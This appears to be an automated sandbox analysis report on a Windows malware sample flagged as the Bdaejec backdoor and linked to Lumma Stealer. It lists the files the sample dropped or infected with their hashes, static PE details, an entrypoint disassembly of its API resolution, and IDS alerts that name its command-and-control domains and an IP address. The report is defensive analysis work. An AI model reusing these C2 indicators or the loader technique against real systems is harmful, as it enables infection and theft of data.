                          LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse

                            Created / dropped Files

                            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):19456
                            Entropy (8bit):6.5906137557629965
                            Encrypted:false
                            SSDEEP:384:1FlS5XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:43QGPL4vzZq2o9W7GsxBbPr
                            MD5:BE24B4EBED28B9588B8AE174E95C4285
                            SHA1:C89B3398B15CC38ED29E508C9024E412CE76049F
                            SHA-256:85F4C6069942D9C7B0095F89AF463C192EA8801784751CA3322A8A067A3B28FD
                            SHA-512:4E3249C1F3F312EB8D2CB35F1080E2BB5955E44931A2199246A944FAB1CAB2110344C1CD51DB4333BA28DD0A6D7461D7E04586E00FB1AE5BB76EAE5E3437D25C
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

                            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:modified
                            Size (bytes):2389504
                            Entropy (8bit):6.731344126494033
                            Encrypted:false
                            SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                            MD5:31DA1001265A8090340DF175C3EBB35B
                            SHA1:1635764E533D859EDA7227B5BA5B4BEF779A1D59
                            SHA-256:9E444CFD7BDB8C393B64F75310A0CA7E80FFE8A678689DA2D1D1EBC7B9DE3AAD
                            SHA-512:70F6DAD677E5C360B1D26E4E93E34127A3786046502C2F30BFA5C22C06330C902FBAA435C9C95FD33E4A7E6493CADC64DE09DE61B776490A08757E8311DDA997
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

                            C:\Program Files\7-Zip\Uninstall.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):31744
                            Entropy (8bit):6.366494315388193
                            Encrypted:false
                            SSDEEP:768:uWQ3655Kv1X/qY1MSdfmQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdf9GCq2iW7z
                            MD5:C85E3E1B5216AC6FE2FF69F1124397E0
                            SHA1:563AD0F43213986CF3147A1AE3C09686A50347A3
                            SHA-256:E05444242F8F435F71BD0F1924D5E8FC27214C8AEF155E45A1D93D047B2EAD00
                            SHA-512:15FE0FCA971CEFCC40B761027EA9338EF8C674394A7D3E1F8A74460C8D7F0BB5E616BFD91EAB6CAA1C1AEC259A177A00C600B208025B92331B6C6EF98B46B405
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_jawuwAtX.exe_92f7bd4c2a248b9282872241334e9a346491113_751f8ef7_703e38e9-db4d-48e3-b293-e2d61713eacb\Report.wer

                            Download File
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9769676201613777
                            Encrypted:false
                            SSDEEP:192:f12bNHhSUI20rGrxJZj8fpvzuiF6Z24IO8gO/:E7S5rGrBjKzuiF6Y4IO8Z
                            MD5:BBADCCD0B29A0F6D427D1BECF00F6760
                            SHA1:6F49A232417353A53FE474F073594DC0FD4433CA
                            SHA-256:D361397C5F0A8A074EE41442A276007DF816BBEE58E10D323C1A709A7D5852AF
                            SHA-512:74C4356FA5CFFCCACFAE5311F9D7AF23820F08B26913399BCD4BD41284118D8371240B19A5B0A87B4906C95038D2CA46C1B65B7B07D1868E4108DB826C5A716E
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.4.9.8.9.7.1.1.1.0.0.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.4.9.8.9.7.9.5.4.7.6.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.3.e.3.8.e.9.-.d.b.4.d.-.4.8.e.3.-.b.2.9.3.-.e.2.d.6.1.7.1.3.e.a.c.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.3.c.6.6.d.2.-.4.8.3.9.-.4.8.a.6.-.b.d.9.0.-.1.8.8.5.0.e.a.a.7.a.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.j.a.w.u.w.A.t.X...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.e.8.-.0.0.0.1.-.0.0.1.5.-.3.b.7.d.-.2.3.7.c.3.e.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.9.6.b.e.f.4.6.4.e.d.e.3.7.4.3.b.a.5.1.c.4.1.5.3.f.5.d.f.3.6.4.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.j.a.w.u.w.A.t.X...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER96C8.tmp.dmp

                            Download File
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Thu Jul 25 02:58:17 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):157498
                            Entropy (8bit):1.8333085239526192
                            Encrypted:false
                            SSDEEP:768:pRHr4SBVZL3y4NuhRkvyJZHIqznyaO1xsPfIk:Lr4K+E9gIqWaOPsPwk
                            MD5:7DC6DE53410E16F349D3BD15BC83D703
                            SHA1:880A032BC0CACC88C66680935AC694904793DA13
                            SHA-256:7792385A5E2532BC3F7D493D9565DD99F5543EEBADA5C4BB12E33776D05CD169
                            SHA-512:2D119D62EC6A37C6BEEF6931C4FC0D3C3862221C7FA6BFFB61EC9D280520ED0BA93644650D396695D29891779A8C8F0F9F2982055A240AF6AA9D856E1E665372
                            Malicious:false
                            Reputation:low
                            Preview:MDMP..a..... .......I..f............t.......................<...T ......d....P..........`.......8...........T............=..J)........... ..........|"..............................................................................eJ.......#......GenuineIntel............T...........C..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F2.tmp.WERInternalMetadata.xml

                            Download File
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):6280
                            Entropy (8bit):3.722717972355917
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJI8m64I+Yqk00pDp89bXvsfndm:R6lXJS6WYW/XUfA
                            MD5:2E62EDBC581E22FE0BFB2198BF39E3D7
                            SHA1:BFDED2D84FB1657C52374CB266B3296B56F365AA
                            SHA-256:B17981CC70A7972D805F23D28617C6A879E6A66574647D632CA9FAD11C8E1741
                            SHA-512:F63135F95B866359D49E427A17E04C7121BAEE93D0E01A6FA98C66294841B3A5012533EF0F6C8B7A9B3600C60639B3FBC8E2969B87CE880BDE5DE4ABD8016EAD
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.5.2.<./.P.i.

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9822.tmp.xml

                            Download File
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4565
                            Entropy (8bit):4.4603162989467195
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsZJg77aI9VJpqrWpW8VYQYm8M4JgKF9Z+q8mXr9ZXgyId:uIjfrI7ZZ7VsJVbr9lgyId
                            MD5:C97A4F318CCFF48A7CCAC0273AB94467
                            SHA1:68A81AC12206DFFA108C79B30DC551CCD760470D
                            SHA-256:5B0B53D78CE962C0B793E248CD54FBFFB1C73E1E891CFF95A7AAB2E59DEF2C46
                            SHA-512:7ECE8CCE1EDDEA308DA5EB47E074FFC8CF872CEC79F74CECA8AAF285976E57F4E0766BB14F901074B29A5D3EE519C64B47E607EA11C27847D788E5A1829DF52F
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425880" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):1.5
                            Encrypted:false
                            SSDEEP:3:Nv:9
                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:foo.

                            C:\Users\user\AppData\Local\Temp\341D4B96.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):1.5
                            Encrypted:false
                            SSDEEP:3:Nv:9
                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                            Malicious:false
                            Preview:foo.

                            C:\Users\user\AppData\Local\Temp\jawuwAtX.exe

                            Download File
                            Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):15872
                            Entropy (8bit):7.031075575407894
                            Encrypted:false
                            SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                            MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                            SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                            SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                            SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 92%
                            Joe Sandbox View:
                            • Filename: Lisect_AVT_24003_G1A_5.exe, Detection: malicious, Browse
                            • Filename: Lisect_AVT_24003_G1A_16.exe, Detection: malicious, Browse
                            • Filename: LisectAVT_2403002C_193.exe, Detection: malicious, Browse
                            • Filename: LisectAVT_2403002C_196.exe, Detection: malicious, Browse
                            • Filename: LisectAVT_2403002B_91.exe, Detection: malicious, Browse
                            • Filename: LisectAVT_2403002B_492.exe, Detection: malicious, Browse
                            • Filename: LisectAVT_2403002B_97.exe, Detection: malicious, Browse
                            • Filename: LisectAVT_2403002B_28.exe, Detection: malicious, Browse
                            • Filename: LisectAVT_2403002B_351.exe, Detection: malicious, Browse
                            • Filename: LisectAVT_2403002B_28.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

                            C:\Windows\appcompat\Programs\Amcache.hve

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.469053871381083
                            Encrypted:false
                            SSDEEP:6144:dzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNFjDH5S3:1ZHtBZWOKnMM6bFpDj4
                            MD5:1512CC64868E0D865770FE9F25DBBC5D
                            SHA1:C3E633EE956232620C025EA1F0CA3BE96FE25863
                            SHA-256:F1407F8FFEB3569813B3A31CEE70B3B1C283F3154F36C78656AE95DB11C8ED12
                            SHA-512:4065761C1FC59A7C7DD0AD44D46D723EC574FBB4E6B816DA5201397825AA2FDFE790EA0865E2B4ACCE59DA8368E10C998D7F462FA2EB6285CF98450B73715351
                            Malicious:false
                            Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.()}>.................................................................................................................................................................................................................................................................................................................................................>I........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.761478892341577
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:Lisect_AVT_24003_G1A_72.exe
                            File size:4'900'864 bytes
                            MD5:0140e8aab1d9274870495213cdf82291
                            SHA1:094a5f534dd47158b2e936f1c6bb8351fb3f1706
                            SHA256:61f30e4ff3a0f6c6b50ac05dacc8344ba3ed9911c2888a606e7c15c4ea4a469f
                            SHA512:64b8e54313b7327fb545b25f36151dbe0f7590934a0102e4263db60d1334ecf7a92977fbaba9ec12b65c5a33786fd8f4adf3c621ad9f34432543b4871c0c859a
                            SSDEEP:49152:TrcrVzPIkVly+g20eZJ6qA/9JtYdMP+tL9Cpf9PTIkKgwWyst/lEzAzSgzsvtsof:TkRI6WeZJ6jxRqO4gwgY+SgYKgTBO
                            TLSH:B23623E73211D0E2E46846B4595DA0E15B9A6E3D6E73401AB51F3BCDE7310CDBF0AEA0
                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......e.............................@............@.......................................@.................................F.3.l..

                            File Icon

                            Icon Hash:1d9e677775470e9d

                            Static PE Info

                            General

                            Entrypoint:0x1104000
                            Entrypoint Section:#bu
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x65CB930E [Tue Feb 13 16:04:30 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:49b6343a7e296cc33dfa349b97649cac

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            sub esp, 0000016Ch
                            xor eax, eax
                            push ebx
                            push esi
                            push edi
                            mov dword ptr [ebp-24h], eax
                            mov dword ptr [ebp-10h], eax
                            mov dword ptr [ebp-14h], eax
                            mov dword ptr [ebp-08h], eax
                            mov dword ptr [ebp-0Ch], eax
                            mov dword ptr [ebp-20h], eax
                            mov dword ptr [ebp-18h], eax
                            mov dword ptr [ebp-48h], 7577616Ah
                            mov dword ptr [ebp-44h], 58744177h
                            mov dword ptr [ebp-40h], 6578652Eh
                            mov dword ptr [ebp-3Ch], 00000000h
                            call 00007FD21931D805h
                            pop eax
                            add eax, 00000225h
                            mov dword ptr [ebp-04h], eax
                            mov eax, dword ptr fs:[00000030h]
                            mov dword ptr [ebp-28h], eax
                            mov eax, dword ptr [ebp-04h]
                            mov dword ptr [eax], E904C483h
                            mov eax, dword ptr [ebp-04h]
                            mov dword ptr [eax+04h], FFC7C577h
                            mov eax, dword ptr [ebp-28h]
                            mov eax, dword ptr [eax+0Ch]
                            mov eax, dword ptr [eax+1Ch]
                            mov eax, dword ptr [eax]
                            mov eax, dword ptr [eax+08h]
                            mov ecx, dword ptr [eax+3Ch]
                            mov ecx, dword ptr [ecx+eax+78h]
                            add ecx, eax
                            mov edi, dword ptr [ecx+1Ch]
                            mov ebx, dword ptr [ecx+20h]
                            mov esi, dword ptr [ecx+24h]
                            mov ecx, dword ptr [ecx+18h]
                            add esi, eax
                            add edi, eax
                            add ebx, eax
                            xor edx, edx
                            mov dword ptr [ebp-30h], esi
                            mov dword ptr [ebp-1Ch], edx
                            mov dword ptr [ebp-34h], ecx
                            cmp edx, dword ptr [ebp-34h]
                            jnc 00007FD21931D94Eh
                            movzx ecx, word ptr [esi+edx*2]
                            mov edx, dword ptr [ebx+edx*4]
                            mov esi, dword ptr [edi+ecx*4]
                            add edx, eax
                            mov ecx, dword ptr [edx]
                            add esi, eax
                            cmp ecx, 4D746547h
                            jne 00007FD21931D854h
                            cmp dword ptr [edx+04h], 6C75646Fh
                            jne 00007FD21931D84Bh

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x33d0460x6c.imports
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x33e0000x658fc.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x578f30x27a7665d5c9b7b1dd2822cbe88c7b38bc138cFalse0.9941202546453066data7.9668438970178IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            0x590000x15000xb0bc2b92bda7759bafbff8a5a3d2140080fFalse1.0038910505836576data7.9005521940385615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            0x5b0000x10ef80xdae84a5ec8143c371db63b6bc24041decc21False0.9985546038543898data7.944942174060495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x6c0000xe8040x77d52caeccb7712d5f61718aff22624f2207False0.9984027121296085data7.959679117642671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            0x7b0000x2c1f880x8165e586951d54ef8e4d0ba92c033e6bbab9dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .imports0x33d0000x10000x200c53b7eff20be0e39153ee42ff8b0a5a2False0.185546875data1.3699486905026688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x33e0000x65a000x65a00539cdad808cada6701185ef4a2eeefbeFalse0.09494397678351783data2.8350695622035795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .themida0x3a40000x5dc0000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .boot0x9800000x3832000x383026f64ad426b79b71b63d76ea834036c2e7unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            #bu0xd040000x50000x42001afc4bcb42c4dabeea8bc2e179808c8aFalse0.7775804924242424data6.935155293246564IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0x33e2680xa068Device independent bitmap graphic, 256 x 512 x 4, image size 32768Raeto-RomanceSwitzerland0.1818868108318722
                            RT_ICON0x3482e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152Raeto-RomanceSwitzerland0.3469512195121951
                            RT_ICON0x3489580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512Raeto-RomanceSwitzerland0.4529569892473118
                            RT_ICON0x348c500x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288Raeto-RomanceSwitzerland0.5081967213114754
                            RT_ICON0x348e480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128Raeto-RomanceSwitzerland0.5709459459459459
                            RT_ICON0x348f800x12428Device independent bitmap graphic, 256 x 512 x 8, image size 65536, 256 important colorsRaeto-RomanceSwitzerland0.07974114878596641
                            RT_ICON0x35b3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRaeto-RomanceSwitzerland0.25826226012793174
                            RT_ICON0x35c2700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRaeto-RomanceSwitzerland0.29106498194945846
                            RT_ICON0x35cb280x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRaeto-RomanceSwitzerland0.23049132947976878
                            RT_ICON0x35d0a00x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336Raeto-RomanceSwitzerland0.06457303902713259
                            RT_ICON0x39f0d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600Raeto-RomanceSwitzerland0.18724066390041494
                            RT_ICON0x3a16900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224Raeto-RomanceSwitzerland0.24648217636022515
                            RT_ICON0x3a27480x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400Raeto-RomanceSwitzerland0.32049180327868854
                            RT_ICON0x3a30e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088Raeto-RomanceSwitzerland0.41400709219858156
                            RT_GROUP_ICON0x3a35580xcadataRaeto-RomanceSwitzerland0.5792079207920792
                            RT_VERSION0x3a36340x2c8dataRaeto-RomanceSwitzerland0.4943820224719101

                            Imports

                            DLLImport
                            kernel32.dllGetModuleHandleA
                            USER32.dllGetDC
                            GDI32.dllBitBlt

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            Raeto-RomanceSwitzerland

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                            2024-07-25T04:58:13.398502+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49713799192.168.2.644.221.84.105
                            2024-07-25T04:58:16.407005+0200UDP2050861ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (smallrabbitcrossing .site)5104853192.168.2.61.1.1.1
                            2024-07-25T04:58:16.386793+0200UDP2050856ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (snuggleapplicationswo .fun)5483253192.168.2.61.1.1.1
                            2024-07-25T04:58:20.629540+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49717443192.168.2.613.89.179.12
